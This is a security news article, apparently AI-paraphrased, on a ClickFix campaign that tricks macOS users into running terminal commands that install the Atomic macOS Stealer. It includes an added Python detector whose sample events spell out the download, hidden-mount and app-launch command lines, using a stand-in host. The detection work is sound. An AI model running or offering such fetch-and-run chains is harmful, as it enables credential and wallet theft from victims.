ClickFix Campaign Uses Terminal Commands for Fully Automated macOS Malware Deployment

Bottom Line: A new ClickFix campaign automates malware downloads on macOS entirely through terminal commands, with Atomic macOS Stealer stealing passwords, browser data, and cryptocurrency wallet holdings.

According to security researchers from Palo Alto Networks Unit 42, a new ClickFix campaign infects macOS systems through fake CAPTCHA prompts that trick users into executing terminal commands. These download malicious DMG files in the background without leaving filesystem traces.

Attackers use prepared web pages with spoofed system error messages or CAPTCHA prompts. They deceive users into copying and executing a provided terminal command. This command uses the system utility curl to download a malicious disk image file (DMG) from an external server and store it in a temporary directory.

Unlike earlier campaigns where users had to manually open the DMG file, the script fully automates this step. It uses the macOS command hdiutil with the -nobrowse parameter to mount the disk image without displaying icons in Finder or on the desktop. The script then searches the directory structure for installation files and executes the found application – in documented cases, a self-signed package called NNApp.app.
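The three-stage chain described above (curl into a temporary directory, a hidden `hdiutil attach -nobrowse` mount, then launching an .app from the mounted volume) is a useful detection pattern. The following is an added example, not code from the article or from Unit 42: a small Python detector that correlates process-start events sharing one parent shell. The event format, the temporary-directory list, the time window and the sample command lines are assumptions constructed for the example.

```python
"""Flag ClickFix-style curl -> hidden mount -> /Volumes app launch chains (added example)."""
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    ts: int          # seconds since epoch (constructed sample values)
    pid: int
    ppid: int        # the shell that ran the pasted command is the common parent
    cmdline: str

# Assumed temporary locations a pasted command would download into
TMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/var/tmp/")

def is_curl_to_tmp(cmd: str) -> bool:
    # curl writing its download into a temporary directory
    return cmd.startswith("curl") and any(d in cmd for d in TMP_DIRS)

def is_hidden_mount(cmd: str) -> bool:
    # hdiutil attach with -nobrowse keeps the image out of Finder and off the desktop
    return cmd.startswith("hdiutil") and "attach" in cmd and "-nobrowse" in cmd

def is_volume_app_launch(cmd: str) -> bool:
    # an .app bundle started straight from a mounted image under /Volumes
    on_volume = re.search(r"/Volumes/[^ ]+\.app", cmd) is not None
    return on_volume and (cmd.startswith("open ") or "/Contents/MacOS/" in cmd)

def find_clickfix_chains(events, window=300):
    """Return parent pids whose children ran all three stages, in order, within `window` seconds."""
    by_parent = {}
    for e in events:
        by_parent.setdefault(e.ppid, []).append(e)
    hits = []
    for ppid, evs in by_parent.items():
        evs.sort(key=lambda e: e.ts)
        stages = {"curl": None, "mount": None, "launch": None}
        for e in evs:
            if stages["curl"] is None and is_curl_to_tmp(e.cmdline):
                stages["curl"] = e.ts
            elif stages["curl"] is not None and stages["mount"] is None and is_hidden_mount(e.cmdline):
                stages["mount"] = e.ts
            elif stages["mount"] is not None and is_volume_app_launch(e.cmdline):
                stages["launch"] = e.ts
        if all(v is not None for v in stages.values()) and stages["launch"] - stages["curl"] <= window:
            hits.append(ppid)
    return hits

# Constructed sample events: one matching chain (parent 400) and one benign download (parent 500)
SAMPLE = [
    ProcEvent(100, 501, 400, "curl -o /tmp/update.dmg https://example.invalid/update.dmg"),
    ProcEvent(103, 502, 400, "hdiutil attach -nobrowse /tmp/update.dmg"),
    ProcEvent(106, 503, 400, "open /Volumes/Update/NNApp.app"),
    ProcEvent(200, 601, 500, "curl -o /Users/me/Downloads/file.pdf https://example.invalid/f.pdf"),
    ProcEvent(210, 602, 500, "hdiutil attach /Users/me/Downloads/tool.dmg"),
]
```

Feeding `SAMPLE` to `find_clickfix_chains` reports only parent 400; a plain user download and a normal, browsable mount under parent 500 do not match.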

The payload delivered this way is a variant of Atomic macOS Stealer (AMOS). Once activated, the malware displays a fake password prompt mimicking macOS system preferences and attempts to extract the user’s administrator password. The malware is designed to steal data from eight Chromium-based browsers such as Google Chrome, Microsoft Edge, and Brave, as well as from five Firefox derivatives such as LibreWolf and Tor Browser – including cookies, saved passwords, credit card data, and browser profiles.

Additionally, the malware targets cryptocurrency wallets (Exodus, Electrum, Binance Wallet, TonKeeper) as well as Apple Notes, local documents, and Keychain databases. A particularly critical aspect is that the malware replaces legitimate installations of Ledger Live and Trezor Suite with manipulated versions to directly steal digital assets. All collected data is compressed and transmitted to the attackers’ command servers.


Source: www.it-daily.net · Published 25 June 2026
Lumi AI News — AI-assisted curation pursuant to Art. 50 EU AI Act. Paraphrase and classification by Lumi News Pipeline v1.7.1.